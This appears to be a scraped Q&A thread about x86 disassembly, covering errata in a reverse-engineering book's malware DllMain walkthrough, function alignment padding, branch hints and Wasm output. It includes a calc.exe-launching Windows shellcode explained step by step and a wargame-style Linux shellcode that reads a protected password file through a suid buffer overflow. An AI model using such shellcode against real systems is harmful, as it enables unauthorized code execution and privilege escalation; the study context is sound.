Errata in "Practical Reverse Engineering"? - windows

I've just started the book Practical Reverse Engineering by Bruce Dang et alia, and am confused about a portion of the "walk-through" at the end of chapter one. This is the relevant portion of code:
65: ...
66: loc_10001d16:
67: mov eax, [ebp-118h]
68: mov ecx, [ebp-128h]
69: jmp short loc_10001d2a (line 73)
70: loc_10001d24:
71: mov eax, [ebp+0ch]
72: mov ecx, [ebp+0ch]
73: loc_10001d2a:
74: cmp eax, ecx
75: pop esi
76: jnz short loc_10001D38 (line 82)
77: xor eax, eax
78: pop edi
79: mov esp, ebp
80: pop ebp
81: retn 0ch
82: ...
And the authors' commentary:
"After the loop exits, execution resumes at line 66. Lines 67–68 save the matching PROCESSENTRY32’s th32ParentProcessID/th32ProcessID in EAX/ECX and
continue execution at 73. Notice that Line 66 is also a jump target in line 43.
Lines 70–74 read the fdwReason parameter of DllMain (EBP+C) and check
whether it is 0 (DLL_PROCESS_DETACH). If it is, the return value is set to 0 and
it returns; otherwise, it goes to line 82."
This is not how I interpreted the code when reading it. Surely any jump to loc_10001d24 (line 70) will cause the function to return 0 unconditionally, and not only if the value at ebp+0x0c is 0? (I assume that popping into esi does not affect the EFLAGS register, and that the jump in line 76 depends on the result of cmp eax, ecx in line 74.) This is also consistent with earlier portions of the code, which jump to loc_10001d24 if various called functions return values indicating failure.
In addition, I thought the point of the section starting at line 66 was to also return 0 if the PROCESSENTRY32 structure (defined earlier, starting at ebp-0x130 in memory) has equal th32ParentProcessID (ebp-0x118) and th32ProcessID (ebp-0x128) fields; is this correct? The authors' commentary does not seem to indicate this.
As a more general question, even chapter 1 of the book seems to have quite a large number of typos; does anyone know of a webpage collecting errata for the book?

Yes, ECX and EAX are both loaded from the same memory location, so unless something else has a pointer to it and is changing it asynchronously, the jne after cmp x,x will never be taken. Unlike floating-point, every possible integer is equal to itself.
And you're correct, pop doesn't change EFLAGS, as per Intel's manuals: https://www.felixcloutier.com/x86/pop.
To check whether a memory location is zero, you can load it into a reg for test eax,eax / jnz
or cmp dword ptr [ebp + 0xc], 0 / jne.
(JNE and JNZ are the same instruction; the different mnemonics let you express the semantic meanings of equality or directly being zero based on ZF being set according to the value itself.)
Lines 70–74 read the fdwReason parameter of DllMain (EBP+C) and check whether it is 0 (DLL_PROCESS_DETACH)
This is bogus. If the book is full of stuff like that, that doesn't sound like a good book.
The cmp eax,ecx only makes any sense when reached from the path that loaded 2 different values. (And the code couldn't use test for that: x & y != 0 doesn't tell you whether x and y were equal.) This seems unlikely to be real compiler output.
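To make the flag behaviour described above concrete, here is a minimal C sketch that models only the zero flag (ZF) left behind by cmp and test. The helper names (zf_after_cmp, zf_after_test, jnz_taken_after_same_load) are made up for illustration and are not part of any real API.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical helpers: each returns the ZF value the instruction would produce. */

/* cmp a, b computes a - b and sets ZF when the result is zero, i.e. when a == b. */
bool zf_after_cmp(uint32_t a, uint32_t b) { return (uint32_t)(a - b) == 0; }

/* test a, b computes a & b and sets ZF when the result is zero. */
bool zf_after_test(uint32_t a, uint32_t b) { return (a & b) == 0; }

/* Models lines 71-76 of the listing: both registers are loaded from
   [ebp+0Ch], and jnz is taken only when ZF is clear. */
bool jnz_taken_after_same_load(uint32_t fdwReason)
{
    uint32_t eax = fdwReason;   /* mov eax, [ebp+0Ch] */
    uint32_t ecx = fdwReason;   /* mov ecx, [ebp+0Ch] */
    return !zf_after_cmp(eax, ecx);
}
```

Under this model jnz_taken_after_same_load is false for every input, while zf_after_test(1, 2) is true even though 1 != 2, which is why test cannot stand in for an equality check between two different values.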

This is the full listing. It's part of malware found in the wild:
01: ; BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
02: _DllMain#12 proc near
03: 55 push ebp
04: 8B EC mov ebp, esp
05: 81 EC 30 01 00+ sub esp, 130h
06: 57 push edi
07: 0F 01 4D F8 sidt fword ptr [ebp-8]
08: 8B 45 FA mov eax, [ebp-6]
09: 3D 00 F4 03 80 cmp eax, 8003F400h
10: 76 10 jbe short loc_10001C88 (line 18)
11: 3D 00 74 04 80 cmp eax, 80047400h
12: 73 09 jnb short loc_10001C88 (line 18)
13: 33 C0 xor eax, eax
14: 5F pop edi
15: 8B E5 mov esp, ebp
16: 5D pop ebp
17: C2 0C 00 retn 0Ch
18: loc_10001C88:
19: 33 C0 xor eax, eax
20: B9 49 00 00 00 mov ecx, 49h
21: 8D BD D4 FE FF+ lea edi, [ebp-12Ch]
22: C7 85 D0 FE FF+ mov dword ptr [ebp-130h], 0
23: 50 push eax
24: 6A 02 push 2
25: F3 AB rep stosd
26: E8 2D 2F 00 00 call CreateToolhelp32Snapshot
27: 8B F8 mov edi, eax
28: 83 FF FF cmp edi, 0FFFFFFFFh
29: 75 09 jnz short loc_10001CB9 (line 35)
30: 33 C0 xor eax, eax
31: 5F pop edi
32: 8B E5 mov esp, ebp
33: 5D pop ebp
34: C2 0C 00 retn 0Ch
35: loc_10001CB9:
36: 8D 85 D0 FE FF+ lea eax, [ebp-130h]
37: 56 push esi
38: 50 push eax
39: 57 push edi
40: C7 85 D0 FE FF+ mov dword ptr [ebp-130h], 128h
41: E8 FF 2E 00 00 call Process32First
42: 85 C0 test eax, eax
43: 74 4F jz short loc_10001D24 (line 70)
44: 8B 35 C0 50 00+ mov esi, ds:_stricmp
45: 8D 8D F4 FE FF+ lea ecx, [ebp-10Ch]
46: 68 50 7C 00 10 push 10007C50h
47: 51 push ecx
48: FF D6 call esi
49: 83 C4 08 add esp, 8
50: 85 C0 test eax, eax
51: 74 26 jz short loc_10001D16 (line 66)
52: loc_10001CF0:
53: 8D 95 D0 FE FF+ lea edx, [ebp-130h]
54: 52 push edx
55: 57 push edi
56: E8 CD 2E 00 00 call Process32Next
57: 85 C0 test eax, eax
58: 74 23 jz short loc_10001D24 (line 70)
59: 8D 85 F4 FE FF+ lea eax, [ebp-10Ch]
60: 68 50 7C 00 10 push 10007C50h
61: 50 push eax
62: FF D6 call esi
63: 83 C4 08 add esp, 8
64: 85 C0 test eax, eax
65: 75 DA jnz short loc_10001CF0 (line 52)
66: loc_10001D16:
67: 8B 85 E8 FE FF+ mov eax, [ebp-118h]
68: 8B 8D D8 FE FF+ mov ecx, [ebp-128h]
69: EB 06 jmp short loc_10001D2A (line 73)
70: loc_10001D24:
71: 8B 45 0C mov eax, [ebp+0Ch]
72: 8B 4D 0C mov ecx, [ebp+0Ch]
73: loc_10001D2A:
74: 3B C1 cmp eax, ecx
75: 5E pop esi
76: 75 09 jnz short loc_10001D38 (line 82)
77: 33 C0 xor eax, eax
78: 5F pop edi
79: 8B E5 mov esp, ebp
80: 5D pop ebp
81: C2 0C 00 retn 0Ch
82: loc_10001D38:
83: 8B 45 0C mov eax, [ebp+0Ch]
84: 48 dec eax
85: 75 15 jnz short loc_10001D53 (line 93)
86: 6A 00 push 0
87: 6A 00 push 0
88: 6A 00 push 0
89: 68 D0 32 00 10 push 100032D0h
90: 6A 00 push 0
91: 6A 00 push 0
92: FF 15 20 50 00+ call ds:CreateThread
93: loc_10001D53:
94: B8 01 00 00 00 mov eax, 1
95: 5F pop edi
96: 8B E5 mov esp, ebp
97: 5D pop ebp
98: C2 0C 00 retn 0Ch
99: _DllMain#12 endp
So lines 70-74 make no sense on their own, but they do serve their purpose: if either Process32First() or Process32Next() returns FALSE, the code jumps here and eventually exits with 0.
And if the desired process was found, eax/ecx are set to th32ParentProcessID/th32ProcessID respectively, so the function continues unless the two happen to be equal.
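The field offsets can be checked against the listing with a small C sketch. ProcessEntry32Model is an illustrative mirror of the 32-bit ANSI PROCESSENTRY32 layout using fixed-width fields (the real definition lives in tlhelp32.h), and ebp_displacement is a made-up helper that assumes the structure starts at ebp-130h, as the lea at line 36 suggests.

```c
#include <stddef.h>
#include <stdint.h>

/* Illustrative mirror of the 32-bit ANSI PROCESSENTRY32 layout.
   Fixed-width fields keep the offsets identical on any host. */
typedef struct {
    uint32_t dwSize;              /* +0x00 */
    uint32_t cntUsage;            /* +0x04 */
    uint32_t th32ProcessID;       /* +0x08 */
    uint32_t th32DefaultHeapID;   /* +0x0C (ULONG_PTR, 4 bytes on x86) */
    uint32_t th32ModuleID;        /* +0x10 */
    uint32_t cntThreads;          /* +0x14 */
    uint32_t th32ParentProcessID; /* +0x18 */
    int32_t  pcPriClassBase;      /* +0x1C */
    uint32_t dwFlags;             /* +0x20 */
    char     szExeFile[260];      /* +0x24 (MAX_PATH characters) */
} ProcessEntry32Model;

/* Assumption: the structure starts at ebp-130h, so a field at
   `field_offset` is addressed as ebp + (field_offset - 0x130). */
long ebp_displacement(size_t field_offset)
{
    return (long)field_offset - 0x130;
}
```

With this layout the structure is 0x128 bytes long (the value stored into dwSize at line 40), szExeFile lands at ebp-10Ch (the buffer passed to _stricmp), th32ProcessID at ebp-128h and th32ParentProcessID at ebp-118h.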
Anyway, there are also lines 83-85, about which the book states:
...with lpStartAddress as 0x100032D0. This block can be decompiled as follows:
if (fdwReason == DLL_PROCESS_DETACH) { return FALSE; }
if (fdwReason == DLL_THREAD_ATTACH || fdwReason == DLL_THREAD_DETACH) { return TRUE; }
CreateThread(0, 0, (LPTHREAD_START_ROUTINE) 0x100032D0, 0, 0, 0);
return TRUE;
Lines 83-85 actually check if fdwReason equals DLL_PROCESS_ATTACH or not (bypassing the call to CreateThread if not, which makes perfect sense), and there's no special case for DLL_PROCESS_DETACH.
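For comparison with the book's version, here is one possible reading of lines 66-98 as portable C. It is a sketch of the control flow only, not the book's decompilation and not real Windows code: dllmain_tail, start_worker_thread and worker_threads_started are hypothetical names, and the CreateThread call is replaced by a counter so the logic can be exercised anywhere.

```c
#include <stdbool.h>
#include <stdint.h>

#define DLL_PROCESS_ATTACH 1u

/* Hypothetical stand-in for the CreateThread call at line 92; it only counts calls. */
int worker_threads_started = 0;
void start_worker_thread(void) { worker_threads_started++; }

/* `found` is true when _stricmp matched (path through loc_10001D16) and
   false when Process32First/Process32Next failed (path through loc_10001D24). */
int dllmain_tail(bool found, uint32_t parent_pid, uint32_t pid, uint32_t fdwReason)
{
    uint32_t eax = found ? parent_pid : fdwReason;  /* line 67 or line 71 */
    uint32_t ecx = found ? pid        : fdwReason;  /* line 68 or line 72 */

    if (eax == ecx)                       /* lines 74-81: jnz not taken */
        return 0;                         /* return FALSE */

    if (fdwReason == DLL_PROCESS_ATTACH)  /* lines 83-85: dec eax / jnz */
        start_worker_thread();            /* lines 86-92 */

    return 1;                             /* lines 94-98: return TRUE */
}
```

In this reading the not-found path always returns 0 regardless of fdwReason, and the found path returns 1 for every reason code (including DLL_PROCESS_DETACH) unless the two IDs are equal; the thread is started only for DLL_PROCESS_ATTACH.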
I'll say that the book certainly lacks proper structure: some things it takes for granted, while other, perhaps mundane, things are emphasized. Still a very good resource.
Oh well, who said this was easy.

Related

Why do I find some never called instructions nopl, nopw after ret or jmp in GCC compiled code? [duplicate]

I've been working with C for a short while and very recently started to get into ASM. When I compile a program:
int main(void)
{
int a = 0;
a += 1;
return 0;
}
The objdump disassembly has the code, but nops after the ret:
...
08048394 <main>:
8048394: 55 push %ebp
8048395: 89 e5 mov %esp,%ebp
8048397: 83 ec 10 sub $0x10,%esp
804839a: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%ebp)
80483a1: 83 45 fc 01 addl $0x1,-0x4(%ebp)
80483a5: b8 00 00 00 00 mov $0x0,%eax
80483aa: c9 leave
80483ab: c3 ret
80483ac: 90 nop
80483ad: 90 nop
80483ae: 90 nop
80483af: 90 nop
...
From what I learned, nops do nothing, and since these come after the ret they wouldn't even be executed.
My question is: why bother? Couldn't ELF (linux-x86) work with a .text section (+main) of any size?
I'd appreciate any help, just trying to learn.
First of all, gcc doesn't always do this. The padding is controlled by -falign-functions, which is automatically turned on by -O2 and -O3:
-falign-functions
-falign-functions=n
Align the start of functions to the next power-of-two greater than n, skipping up to n bytes. For instance,
-falign-functions=32 aligns functions to the next 32-byte boundary, but -falign-functions=24 would align to the next 32-byte boundary only
if this can be done by skipping 23 bytes or less.
-fno-align-functions and -falign-functions=1 are equivalent and mean that functions will not be aligned.
Some assemblers only support this flag when n is a power of two; in
that case, it is rounded up.
If n is not specified or is zero, use a machine-dependent default.
Enabled at levels -O2, -O3.
There could be multiple reasons for doing this, but the main one on x86 is probably this:
Most processors fetch instructions in aligned 16-byte or 32-byte blocks. It can be
advantageous to align critical loop entries and subroutine entries by 16 in order to minimize
the number of 16-byte boundaries in the code. Alternatively, make sure that there is no 16-byte boundary in the first few instructions after a critical loop entry or subroutine entry.
(Quoted from "Optimizing subroutines in assembly language" by Agner Fog.)
edit: Here is an example that demonstrates the padding:
// align.c
int f(void) { return 0; }
int g(void) { return 0; }
When compiled using gcc 4.4.5 with default settings, I get:
align.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <f>:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: b8 00 00 00 00 mov $0x0,%eax
9: c9 leaveq
a: c3 retq
000000000000000b <g>:
b: 55 push %rbp
c: 48 89 e5 mov %rsp,%rbp
f: b8 00 00 00 00 mov $0x0,%eax
14: c9 leaveq
15: c3 retq
Specifying -falign-functions gives:
align.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <f>:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: b8 00 00 00 00 mov $0x0,%eax
9: c9 leaveq
a: c3 retq
b: eb 03 jmp 10 <g>
d: 90 nop
e: 90 nop
f: 90 nop
0000000000000010 <g>:
10: 55 push %rbp
11: 48 89 e5 mov %rsp,%rbp
14: b8 00 00 00 00 mov $0x0,%eax
19: c9 leaveq
1a: c3 retq
This is done to align the next function to an 8-, 16- or 32-byte boundary.
From “Optimizing subroutines in assembly language” by A.Fog:
11.5 Alignment of code
Most microprocessors fetch code in aligned 16-byte or 32-byte blocks. If an important subroutine entry or jump label happens to be near the end of a 16-byte block then the microprocessor will only get a few useful bytes of code when fetching that block of code. It may have to fetch the next 16 bytes too before it can decode the first instructions after the label. This can be avoided by aligning important subroutine entries and loop entries by 16.
[...]
Aligning a subroutine entry is as simple as putting as many NOP's as needed before the subroutine entry to make the address divisible by 8, 16, 32 or 64, as desired.
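The amount of padding follows directly from the address arithmetic. The sketch below assumes a power-of-two alignment; padding_bytes is a made-up helper name, and the 16-byte boundary used in the note after it is an assumption that happens to match the listings in this thread.

```c
#include <stdint.h>

/* Number of filler bytes needed so that `addr` becomes a multiple of `align`.
   `align` is assumed to be a power of two (8, 16, 32, 64, ...). */
uint64_t padding_bytes(uint64_t addr, uint64_t align)
{
    return (align - (addr & (align - 1))) & (align - 1);
}
```

For the question's listing, the first free byte after ret is 0x80483ac, and padding_bytes(0x80483ac, 16) is 4, matching the four nops. In the align.c example, f ends at 0xa, so the next free byte is 0xb and padding_bytes(0xb, 16) is 5, which is the gap filled before g at 0x10.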
As far as I remember, instructions are pipelined in the CPU, and different CPU blocks (loader, decoder and such) process subsequent instructions. When a RET instruction is being executed, the next few instructions are already loaded into the CPU pipeline. It's a guess, but you can start digging here, and if you find out more (maybe the specific number of NOPs that are safe), please share your findings.

Can not understand how my shellcode works. Shellcode for windows OS( not Linux!) to open calc.exe

I’ve got a shellcode. It opens calculator in my buffer overflow program.
0: eb 16 jmp 0x18
2: 5b pop ebx
3: 31 c0 xor eax,eax
5: 50 push eax
6: 53 push ebx
7: bb 4d 11 86 7c mov ebx,0x7c86114d
c: ff d3 call ebx
e: 31 c0 xor eax,eax
10: 50 push eax
11: bb ea cd 81 7c mov ebx,0x7c81cdea
16: ff d3 call ebx
18: e8 e5 ff ff ff call 0x2
1d: 63 61 6c arpl WORD PTR [ecx+0x6c],sp
20: 63 2e arpl WORD PTR [esi],bp
22: 65 78 65 gs js 0x8a
25: 00 90 90 90 90 90 add BYTE PTR [eax-0x6f6f6f70],dl
2b: 90 nop
2c: 90 nop
2d: 90 nop
2e: 90 nop
2f: 90 nop
Apart from the main question being “What does this shellcode do line by line”, I am particularly interested in:
The jmp operation, why and where does my program jump?
The arpl stuff, I see it for the first time and google does not help me much... Same with GS operation
The jmp 0x18 is a relative jump to offset 0x18, which is practically the end of your code. It then calls address 0x2 (again, relative). This call places the "return address" on the stack, so it could be popped from it, giving you a clue about the address in which this relative shellcode is being executed. And indeed, the pop ebx at offset 0x2 is getting the address from the stack.
I said that 0x18 is the end of the code, because the lines after it are data bytes and not asm opcodes. This is why you see arpl. If you look at the hex values of the bytes, you will see:
calc.exe\0 ==> 0x63 0x61 0x6c 0x63 0x2e 0x65 0x78 0x65 0x00
Edited:
The full flow of the shellcode is:
jmp 0x18 - jump to the last code instruction of the shellcode
call 0x2 - jumps back to offset 2, and pushes the address of offset 0x1D (the return address) on the stack
pop ebx - ebx := address from the stack, which is the address of the string "calc.exe"
xor eax,eax - common opcode to zero the register: eax := 0
push eax - push the value 0 as the second argument for a future function call
push ebx - push the pointer to "calc.exe" as the first argument for a future function call
mov ebx,0x7c86114d - ebx will be a fixed address (probably WinExec)
call ebx - call the function: WinExec("calc.exe", 0)
xor eax,eax - again, eax := 0
push eax - push the value 0 as the first argument for a future function call
mov ebx,0x7c81cdea - ebx will be a fixed address (probably exit)
call ebx - call the function: exit(0)
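The two relative branches in this flow can be checked by hand from their encodings. The C sketch below does the arithmetic; the function names are made up for illustration, and offsets are relative to the start of the shellcode rather than real addresses.

```c
#include <stdint.h>

/* Target of a short jump (opcode EB): the instruction is 2 bytes long and
   the signed 8-bit displacement is added to the offset of the next instruction. */
uint32_t jmp_short_target(uint32_t insn_offset, uint8_t rel8)
{
    return insn_offset + 2 + (uint32_t)(int32_t)(int8_t)rel8;
}

/* Return address pushed by a near call (opcode E8): the instruction is 5 bytes long. */
uint32_t call_return_address(uint32_t insn_offset)
{
    return insn_offset + 5;
}

/* Target of a near call: return address plus the little-endian 32-bit displacement.
   Unsigned wrap-around gives the same result as signed addition. */
uint32_t call_rel32_target(uint32_t insn_offset, const uint8_t rel32[4])
{
    uint32_t disp = (uint32_t)rel32[0]
                  | ((uint32_t)rel32[1] << 8)
                  | ((uint32_t)rel32[2] << 16)
                  | ((uint32_t)rel32[3] << 24);
    return call_return_address(insn_offset) + disp;
}
```

For eb 16 at offset 0 this gives 0x18; for e8 e5 ff ff ff at offset 0x18 the pushed return address is 0x1D (where the "calc.exe" bytes start) and the target is 0x2, the pop ebx.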

gcc likely() unlikely() macros and assembly code

I'm trying to see how gcc's likely() and unlikely() branch prediction macros affect the generated assembly code. In the following piece of code I don't see any difference in the generated assembly regardless of which macro I use. Any pointers on what's happening?
int main() {
    volatile int x;
    unlikely(x)?x++:x--;
}
Asm code:
0000000000000014 <main>:
int main() {
14: 55 push rbp
15: 48 89 e5 mov rbp,rsp
volatile int x;
likely(x)?x++:x--;
18: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]
1b: 85 c0 test eax,eax
1d: 0f 95 c0 setne al
20: 0f b6 c0 movzx eax,al
23: 48 85 c0 test rax,rax
26: 74 0b je 33 <main+0x1f>
28: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]
2b: 83 c0 01 add eax,0x1
2e: 89 45 fc mov DWORD PTR [rbp-0x4],eax
31: eb 09 jmp 3c <main+0x28>
33: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]
36: 83 e8 01 sub eax,0x1
39: 89 45 fc mov DWORD PTR [rbp-0x4],eax
}
3c: 5d pop rbp
3d: c3 ret
It looks like you compiled without optimization. Basic block reordering is an optimization, so without it, __builtin_expect does not have this effect. With optimization, I observe that the sense of the branch is inverted when switching the expected result.
Note that whether this has any effect on current x86 processors is difficult to say.
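A small test case for trying this yourself might look like the sketch below. The macro definitions are the common kernel-style ones and are an assumption, since the question does not show its own; on_hit, on_miss and the dispatch functions are made-up names. The arms call non-inlined functions so that the compiler keeps a real branch instead of emitting branchless code.

```c
/* Kernel-style definitions, assumed here because the question does not show its own. */
#define likely(x)   __builtin_expect(!!(x), 1)
#define unlikely(x) __builtin_expect(!!(x), 0)

/* Counters are volatile so the calls have an observable side effect. */
volatile int hits = 0;
volatile int misses = 0;

__attribute__((noinline)) void on_hit(void)  { hits++; }
__attribute__((noinline)) void on_miss(void) { misses++; }

/* Same logic twice; only the hint passed to __builtin_expect differs. */
void dispatch_likely(int x)   { if (likely(x))   on_hit(); else on_miss(); }
void dispatch_unlikely(int x) { if (unlikely(x)) on_hit(); else on_miss(); }
```

Compiling this with gcc -O2 -S and comparing the bodies of dispatch_likely and dispatch_unlikely is one way to look for the reordering; whether the layout actually differs depends on the compiler version and target, and at -O0 it should not.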

Is tooling available to 'assemble' WebAssembly to x86-64 native code?

I am guessing that a Wasm binary is usually JIT-compiled to native code, but given a Wasm source, is there a tool to see the actual generated x86-64 machine code?
Or asked in a different way, is there a tool that consumes Wasm and outputs native code?
The online WasmExplorer compiles C code to both WebAssembly and Firefox x86 code, using the SpiderMonkey compiler. Given the following simple function:
int testFunction(int* input, int length) {
int sum = 0;
for (int i = 0; i < length; ++i) {
sum += input[i];
}
return sum;
}
Here is the x86 output:
wasm-function[0]:
sub rsp, 8 ; 0x000000 48 83 ec 08
cmp esi, 1 ; 0x000004 83 fe 01
jge 0x14 ; 0x000007 0f 8d 07 00 00 00
0x00000d:
xor eax, eax ; 0x00000d 33 c0
jmp 0x26 ; 0x00000f e9 12 00 00 00
0x000014:
xor eax, eax ; 0x000014 33 c0
0x000016: ; 0x000016 from: [0x000024]
mov ecx, dword ptr [r15 + rdi] ; 0x000016 41 8b 0c 3f
add eax, ecx ; 0x00001a 03 c1
add edi, 4 ; 0x00001c 83 c7 04
add esi, -1 ; 0x00001f 83 c6 ff
test esi, esi ; 0x000022 85 f6
jne 0x16 ; 0x000024 75 f0
0x000026:
nop ; 0x000026 66 90
add rsp, 8 ; 0x000028 48 83 c4 08
ret
You can view this example online.
WasmExplorer compiles code into wasm / x86 via a service - you can see the scripts that are run on Github - you should be able to use these to construct a command-line tool yourself.

PTRACE_TRACEME without parent

For fun, I'm trying to exploit a program that uses ptrace to prevent debugging. The executable is suid, so there's no use in cracking it.
It also has an executable stack segment. The executable is made for playing. After finding a vulnerability in it myself, I tried to exploit it with a buffer overflow. I wrote a shellcode which launches a shell, and to my surprise it hangs (bash reports that the process has been stopped). After some tests, I came to the conclusion that ptrace not only prevents debugging, but also prevents my shellcode from being executed.
Reading about ptrace, I found that a process which invokes ptrace(PTRACE_TRACEME,0,1,0) will be stopped as soon as it invokes the exec syscall. So I changed strategy: since ptrace will stop the process as soon as it launches an executable, I tried a shellcode which reads a file instead. My objective is not to launch a shell, but to read a file which my user has no permission to read. In the end, this code also hung.
Can anyone explain why my code hangs, even though it contains no exec call?
Is there any way to stop the ptrace from within the process itself?
In my case, the ptraced process has no parent and is running with higher privileges because of the suid bit; how can it be controlled?
Here is my shellcode, which should not contain any exec call:
0: 31 c0 xor eax,eax
2: 31 db xor ebx,ebx
4: 31 c9 xor ecx,ecx
6: 31 d2 xor edx,edx
8: eb 38 jmp 0x42
a: 5b pop ebx
b: c6 43 13 01 mov BYTE PTR [ebx+0x13],0x1
f: fe 4b 13 dec BYTE PTR [ebx+0x13]
12: b0 05 mov al,0x5
14: 31 c9 xor ecx,ecx
16: cd 80 int 0x80
18: 89 c6 mov esi,eax
1a: eb 06 jmp 0x22
1c: b0 01 mov al,0x1
1e: 31 db xor ebx,ebx
20: cd 80 int 0x80
22: 89 f3 mov ebx,esi
24: b0 03 mov al,0x3
26: 83 ec 01 sub esp,0x1
29: 89 e1 mov ecx,esp
2b: b2 01 mov dl,0x1
2d: cd 80 int 0x80
2f: 31 db xor ebx,ebx
31: 39 c3 cmp ebx,eax
33: 74 e7 je 0x1c
35: b0 04 mov al,0x4
37: b3 01 mov bl,0x1
39: b2 01 mov dl,0x1
3b: cd 80 int 0x80
3d: 83 c4 01 add esp,0x1
40: eb e0 jmp 0x22
42: e8 c3 ff ff ff call 0xa
47: db '/home/level8/passwd'
I believe you have a core misunderstanding of how ptrace works.
When the process stops after calling execve, that is a good thing. It means your debugger gets a chance to change things around, both before and after the execve.
It seems to me like you wrote ptrace(PTRACE_TRACEME) in the child, but you have not implemented any of the parent side support you should have. As a result, as soon as ptrace is trying to notify the debugger of an event, your process stops and never restarts.
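To illustrate what "parent side support" means, here is a minimal Linux-only sketch of a tracer that resumes its tracee. It is an assumption about the general pattern, not a reconstruction of the target program: run_traced_child is a made-up name, the child stops itself with SIGSTOP instead of calling exec, and the exit status 7 is an arbitrary marker.

```c
#include <signal.h>
#include <stddef.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Forks a child that asks to be traced, then plays the tracer role.
   Returns the child's exit status, or -1 on error. */
int run_traced_child(void)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;

    if (pid == 0) {
        /* Child: become a tracee of the parent, then stop so the parent is notified. */
        if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) < 0)
            _exit(1);
        raise(SIGSTOP);
        _exit(7);   /* arbitrary marker value */
    }

    for (;;) {
        int status;
        if (waitpid(pid, &status, 0) < 0)
            return -1;
        if (WIFEXITED(status))
            return WEXITSTATUS(status);
        if (WIFSIGNALED(status))
            return -1;
        if (WIFSTOPPED(status)) {
            /* Tracer side: without this call the tracee stays stopped. */
            if (ptrace(PTRACE_CONT, pid, NULL, NULL) < 0)
                return -1;
        }
    }
}
```

If the PTRACE_CONT call is removed, the child never gets past its stop, which is the same symptom as a traced process whose tracer does not handle its events.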

Resources